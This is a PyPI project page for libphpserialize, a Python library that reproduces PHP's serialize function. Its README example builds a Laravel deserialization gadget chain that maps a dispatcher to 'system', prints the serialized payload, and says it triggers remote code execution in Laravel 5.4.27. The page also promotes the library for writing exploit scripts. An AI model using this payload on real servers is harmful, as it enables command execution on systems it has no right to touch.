A port of PHP's serialize function, in pure python

Navigation

Verified details

These details have been verified by PyPI
Maintainers
Avatar for frankli0324 from gravatar.com frankli0324

Unverified details

These details have not been verified by PyPI
Project links
Meta
  • License: MIT License
  • Author: Frank
  • Requires: Python >=3.7
Classifiers

Project description

libphpserialize

A port of PHP's serialize function, in pure python

Installation

pip install libphpserialize

Features

  • serialize objects directly from python objects
  • nested objects
  • namespacing
  • variable Access Modifiers (public, private, protected)

Example

from phpserialize import serialize
from phpserialize.decorators import namespace
import requests


@namespace('Faker')
class Generator:
    protected_formatters = {'dispatch': 'system'}


@namespace('Illuminate\Broadcasting')
class PendingBroadcast:
    protected_event = 'ls'
    protected_events = Generator()


print(serialize(PendingBroadcast()))

with above code, you'll get:

O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"*events";O:15:"Faker\Generator":1:{s:13:"*formatters";a:1:{s:8:"dispatch";s:6:"system";}}s:8:"*event";s:2:"ls";}

which triggers an RCE vulnerability in Laravel 5.4.27

nice when you're writing an exploit script for others to read

Important:

  • the code is written and tested under python 3.7+
  • decimal serialization doesn't work the same as PHP does, yet

TODO

  • recursive objects support
  • reimplement decimal precision calculating algorithm from php engine

Project details

Verified details

These details have been verified by PyPI
Maintainers
Avatar for frankli0324 from gravatar.com frankli0324

Unverified details

These details have not been verified by PyPI
Project links
Meta
  • License: MIT License
  • Author: Frank
  • Requires: Python >=3.7
Classifiers

Release history Release notifications | RSS feed

This version

0.0.8

0.0.7

0.0.6

0.0.5

0.0.4

0.0.3

0.0.2

0.0.1

0.0.1b5 pre-release

0.0.1b4 pre-release

0.0.1b3 pre-release

0.0.1b2 pre-release

0.0.1b0 pre-release

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

libphpserialize-0.0.8.tar.gz (5.1 kB view details)

Uploaded Source

Built Distribution

libphpserialize-0.0.8-py3-none-any.whl (6.2 kB view details)

Uploaded Python 3

File details

Details for the file libphpserialize-0.0.8.tar.gz.

File metadata

  • Download URL: libphpserialize-0.0.8.tar.gz
  • Upload date:
  • Size: 5.1 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.1 CPython/3.10.6

File hashes

Hashes for libphpserialize-0.0.8.tar.gz
Algorithm Hash digest
SHA256 ad72e7ff47ddad6d576e7ff7b1ce26d0d4f0d2c0c5a578cb10c4181c39b34856
MD5 584ee1ff2b8d40641fe8e41f433c1bb4
BLAKE2b-256 7a2bd8241fec1ab38308b24cfaf53ea81ef4532fa11fa42a19d5e5e51a12e5d0

See more details on using hashes here.

File details

Details for the file libphpserialize-0.0.8-py3-none-any.whl.

File metadata

File hashes

Hashes for libphpserialize-0.0.8-py3-none-any.whl
Algorithm Hash digest
SHA256 7f2940ae00e22978076323fc7471531eb95967d45edd940fa0f014466e4d9519
MD5 93c536284e0d97df02dd552132a6098f
BLAKE2b-256 e2bdd4375797c38b53143ed9c82fdf1a25df7664dc60fa6c75c0d947aef8b693

See more details on using hashes here.

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page